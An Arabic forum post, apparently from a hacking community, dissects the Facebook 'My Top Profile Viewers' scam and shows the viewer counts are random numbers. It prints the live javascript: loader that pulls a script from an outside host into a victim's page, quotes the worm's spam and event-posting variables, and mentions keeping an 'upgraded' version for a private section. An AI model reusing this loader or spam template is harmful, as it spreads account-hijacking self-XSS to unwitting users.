نشوف الثغره الي جديد طلعت واستغلوها الهاكرز بشغل غبي
طبعا الثغره مجرد ازعاج
عباره عن حلقه مغلقه
يعني تنشر نفسها بنفسها من خلال الايفنت
boot event
اتفقت انا وصاحبي
cyber
نعمل اكاونت نفتح فيه الايفنت عشان نحلله ونعرف ايش الي بصير
---------- هام
اقرا الي بكتبه لكن مش ضروري اتطبق بلاش تروح انت الثاني بستين داهيه
ومحد يساوي حريف يحاول يحلل اكواد اذا مكنش فاهم كل خطوه بعملها
--------- اول ما فتحنا اللثغره هذا ما حصل
طيب يا زريقي نفتح ال post ألي اجاني منه tag :P
--- هون انا بدي اركز ع شغلتين السهم الازرق 199 views لوني بالفيس بوك من ايام ما سيدي بقى عايش ما وصل لهاد الرقم الاحترافي :P (بلش عبدو يتخوت وهو مداوم ببروفايلات العالم بقى ليه)
الاشي الثاني الي راح نركز عليه هو السهم الاحمر وبالاخص تحت الخط الاخضر
هاد اللنك هو بدايه الحلقه المغلقه ومن هنا تبدا الحكايه بلش شغلنا ببتبع الثغره وتحليلها
كل الي بدي اياه من النك والصفحه الي قدامي هو هاد الكود javascript:(a=(b=********).createElement('script') ).src='//bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)
كود بسيط خفيف نظيف ومبين نص سطر لكن حقيقه هو مليون امر مخفيات تحت اللنك الي باللون الاحمر
نحلل اللنك الي عنا jsp.php نشوف الحلاوه الي طلعت معي
هاي مجرد خرابيط ب5 اسطر لسا الكود الكبيير ما ظهر والي هو سبب المصايب نفتح السوس بيج وراح نحصل ع الثغره الي مجننه الشعب
طيب راح يطلع معانا كلام حوالي 321 سطر تذكرو بالبدايه كلها كانت نصف سطر
الي بهمني من هاد الكلام كله اني اثبت لكم صدق او كذب الاعلان الي حصل بخصوص My Top Profile Viewers
الي يلزمنا نحلل هاد الكود
اقتباس
var message = '%firstname% See who views your Profile ';
var ev = 'check out this new facebook feature! \x0A see your Profile view results by copying and pasting the link below in the address bar \x0A ';
var post = ' see who viewed your facebook Profile @ ';
var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber;
var chatmessage = message + url + randomnumber;
var redirect = 'http://www.gameindiagame.blogspot.com/';
var eventdesc = ev + url + randomnumber;
var eventname = 'How to see who viewed your profile!!';
var nfriends = 5000;
راح اشرحه شرح سريع عشان انا عارف اغلب الي رح يقراو الكود ما رح يفهمو شيء الكود بقولك اطبع الكلام هاد
My Top Profile Viewers Are وانزل سطر اطبع اسم شخص من الفرندس وطبع مقدار مشاهدته للبروفايل هون رح نركز شويه مقدار مشاهدته للبروفايل هو رقم عشوائي randomnumber1 الي بتبع الكود بلقى الكل رقم عشوائي اذن صفا لنا الكود راح ينزل لنا اسماء عشوائيه من الفرندس عنا ويضع لنا مشاهدات بارقام عشوائيه
:party: قلتلكم كذب بكذب
طيب هيك خلصنا كشف الغطاء عن الخداع ونصيحه مني لا تصدقو هيك كلام مره ثانيه
وفي كمان كذبه اتصل من الفيس بوك مجانا لكن بحس نفسي سخيف لو شرحتها ....(شو عرفك انها كذبه قال من كبرها)
وان شاء الله هاد الشرح يكون كفاره عن ....... (والله بطلع مديون)
طبعا تم سحب الثغره واح نعدلها لاشي اخطر لكن ما رح ننشرها
الا في VBSPIDERS VIP SECTION
بكل بساطه ما بدي ينتشر الموضوع بين ناس تخرب وتكركب just to have more best security and info about hacking
visit us http://www.facebook.com/vbspiders
hack to learn not learn hack
DiV by VoLc4n0 وسنه طيبه ع الاخوان المسيحين بمناسبه عيد الفصح
:party: